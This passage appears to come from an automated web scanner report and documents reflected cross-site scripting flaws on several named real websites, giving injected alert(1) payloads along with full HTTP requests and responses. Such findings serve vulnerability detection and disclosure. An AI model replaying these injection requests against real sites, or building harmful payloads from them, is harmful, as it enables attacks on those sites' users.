...[SNIP]...
<b>download ga 81845gv gigabyte vga driver?b8ed7<img src=a onerror=alert(1)>ec91bc08206=1</b>
...[SNIP]...

4.45. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3c5e\"><img src=a onerror=alert(1)>e0edaa08961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961=1 HTTP/1.1
Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:36 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:35 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
...[SNIP]...
<meta name="description" content="download ga 81845gv gigabyte vga driver?a3c5e\"><img src=a onerror=alert(1)>e0edaa08961=1 free drivers downloads: GIGABYTE GA-7VA Bios (Rev 2.0) 1.1 and other" />
...[SNIP]...

4.46. http://ds.addthis.com/red/psi/sites/www.klivio.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.klivio.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7a43e<script>alert(1)</script>9a66bdcec19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.klivio.com/p.json?callback=_ate.ad.hpr7a43e<script>alert(1)</script>9a66bdcec19&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.klivio.com%2F%3F34aa6%2522%253E%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Eceac919ade3%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F69&fb5wa3 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 16:16:53 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 16:16:53 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 06 Feb 2011 16:16:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 16:16:53 GMT
Connection: close

_ate.ad.hpr7a43e<script>alert(1)</script>9a66bdcec19({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.47. http://ecal.forexpros.com/e_cal.php [bg1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecal.forexpros.com
Path:   /e_cal.php

Issue detail

The value of the bg1 request parameter is copied into the HTML document as plain text between tags. The payload 6b18f<script>alert(1)</script>3e30c6ee661 was submitted in the bg1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF6b18f<script>alert(1)</script>3e30c6ee661&bg2=ECECEC&border=CEDBEB HTTP/1.1
Host: ecal.forexpros.com
Proxy-Connection: keep-alive
Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:26:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tc9icm70rmuv839h8bl7m5vf82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107